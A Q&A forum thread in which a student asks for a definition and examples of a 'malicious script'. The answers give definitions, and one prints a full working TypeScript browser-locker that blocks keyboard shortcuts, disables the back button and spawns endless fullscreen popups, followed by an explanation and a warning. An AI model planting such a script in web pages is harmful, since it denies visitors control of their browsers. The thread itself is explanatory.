# What is the definition of a "malicious script"

Tags: definition

I need to know the definition of a "malicious script." I've searched it up on google and some other sites but I can't seem to find a good one. I also want to know what it usually does and some examples of it.

Comment: evil code written by bad people

Comment: No context. My professor asked us to define a list of terms and this was one of them

Comment: @tq Except the code is outside the realm of human nature and thus can be neither "evil" nor "good" any more than it can "go to hell"; it can, however, be "helpful", "benign", or "harmful". Also, the person who wrote it might not be "bad" (in any case, the label is a subjective one).

Answer (score 1, accepted):

What is the definition of [malicious](http://dictionary.reference.com/browse/malicious)?

It is just that adjective applied to a script (or other [code] execution vector). That is some code, maybe [cross-site scripting (XSS)](http://en.wikipedia.org/wiki/Cross-site_scripting) for impersonation, perhaps an browser extension to monitor keystrokes, a macro [backdoor](http://en.wikipedia.org/wiki/Backdoor_(computing)) or [virus](http://en.wikipedia.org/wiki/Macro_virus), a bash [script to fork-bomb](http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/), some [PHP code to gather attack vector information](https://stackoverflow.com/questions/8126138/php-help-decoding-malicious-code), etc. Generally unfavorable for the recipient(s).

The actual usage varies -- e.g. context of "script" -- and can encompass other terms. For instance, a "malicious script" could also be a trojan, virus, or [denial of service (DoS)](http://www.w3.org/Security/faq/wwwsf6.html) agent.

I would argue that the key is that the code was *designed* for such malicious purposes -- that is, the maliciousness was "instilled in it" -- and hence the term excludes other code that can cause "bad behavior" through incorrect (or even normal) operation.

Answer (score 0):

Software is a tool and like any tool it may be used for good or evil. Malware is considered malicious because it may attempt to steal passwords, spy on users, attack and infect other computers, etc. In general, malicious software does things that humans consider bad and or unethical/illegal, thus, it is called malicious. You might write a "malicious script" to use all the CPU or memory, thus denying other users the ability to use the system, or you may attempt to elevate your access to a system so that you can read other peoples files and steal their data, etc.

Answer (score 0):

Basically this:
(Found this on a website. It is designed to crash your browser. I was using Firefox, so the popups were blocked by default. Also, I compiled it into typescript for your sanity):

```
import Mousetrap from "mousetrap";

Mousetrap.bind("ctrl+s", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});
Mousetrap.bind("ctrl+w", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});
Mousetrap.bind("ctrl+shift+w", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});
Mousetrap.bind("ctrl+a", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});
Mousetrap.bind("ctrl+f", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});
Mousetrap.bind("ctrl+shift+esc", (e)=>{
    e.preventDefault();
    e.stopPropagation();
});


history.pushState(null, "", location.href);
window.onpopstate = function () {
  history.go(1);
};
document.addEventListener("click", (e)=>{
    document.body.requestFullscreen();
    openWins();
});
const openWins = (e?)=>{
    const win = window.open("about:blank", Math.random().toString(), "fullscreen=yes");
    if (win) {
        win.focus()
        win.onblur = openWins;
        win.onbeforeunload = openWins;
    }
    setInterval(()=>{
        const win = window.open("about:blank", Math.random().toString(), "fullscreen=yes");
        if (win) {
            win.focus()
            win.onblur = openWins;
            win.onbeforeunload = openWins;
        }
    },1000);
}
```

If you aren't sure what this code does. It does this:

1. Hijacks keyboard to disable keyboard shortcuts like ctrl+w and ctrl+shift+w
2. Each click, it starts a new loop, opening a popup every second.
3. Disables back button

My friend sent me a link, I was skeptical, so I decided to open in Firefox, for safety. Thank goodness I did. I still had to use task manager to escape, as it also uses document.requestPointerLock() to keep the pointer. Also, it disabled escape somehow, so I couldn't escape the lock.

#### DO NOT USE THIS AT ALL.

Comment: This isn't necessarily malicious, as it doesn't really do much harm to your computer, except possibly crashing your browser or entire machine.

Comment: If you use Chrome, It will NOT automatically block the popups. So, if you click, 1000's of popups will occur. Quickly